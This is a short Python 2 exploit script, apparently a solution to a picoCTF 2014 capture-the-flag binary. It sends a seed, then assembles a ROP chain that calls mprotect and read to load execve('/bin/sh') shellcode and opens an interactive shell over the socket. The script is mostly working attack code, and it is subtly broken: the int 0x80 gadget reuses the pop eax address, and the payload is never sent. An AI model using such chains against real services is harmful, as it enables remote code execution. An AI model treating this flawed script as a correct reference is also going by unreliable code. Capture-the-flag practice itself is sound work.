Untitled


#!/usr/bin/python
import struct
import socket
import telnetlib

def pack4(v):
    """
    Takes a 32 bit integer and returns a 4 byte string representing the
    number in little endian.
    """
    assert 0 <= v <= 0xffffffff
    # The < is for little endian, the I is for a 4 byte unsigned int.
    # See https://docs.python.org/2/library/struct.html for more info.
    return struct.pack('<I', v)

def unpack4(v):
    """Does the opposite of pack4."""
    assert len(v) == 4
    return struct.unpack('<I', v)[0]


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('vuln2014.picoctf.com', 4000))
s.connect(('127.0.0.1', 4000))
f = s.makefile('rw', bufsize=0)

seed = 0x1e
f.write(pack4(seed))
payload = "A" * 31
"""
int 0x80; ret offset found @ pos f0030fa
pop eax; ret found @ pos f000d25
pop ebx; ret found @ pos f0010a4
pop ecx; ret found @ pos f001985
pop edx; ret found @ pos f00107f
"""
pop_eax = pack4(0xf000d25)
pop_ebx = pack4(0xf0010a4)
pop_ecx = pack4(0xf001985)
pop_edx = pack4(0xf00107f)
int_80 = pack4(0xf000d25)
####mprotect
payload += pop_eax
payload += pack4(0x7d) #syscall no of mprotect
payload += pop_ebx
payload += pack4(0xf000000) #buf
payload += pop_ecx
payload += pack4(0x1000 * 10) #size
payload += pop_edx
payload += pack4(7) #perms
payload += int_80

####read
payload += pop_eax
payload += pack4(3) #syscall no of read()
payload += pop_ebx
payload += pack4(0) #stdin
payload += pop_ecx
payload += pack4(0xf000000) #buf
payload += pop_edx
payload += pack4(30) #size of shellcode (buf)
payload += int_80

###trigger payload
push_ebx = pack4(0xf00083f)
payload += pop_ebx
payload += pack4(0xf000000) #addr of shellcode
payload += push_ebx

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
f.write(shellcode)

t = telnetlib.Telnet()
t.sock = s
t.interact()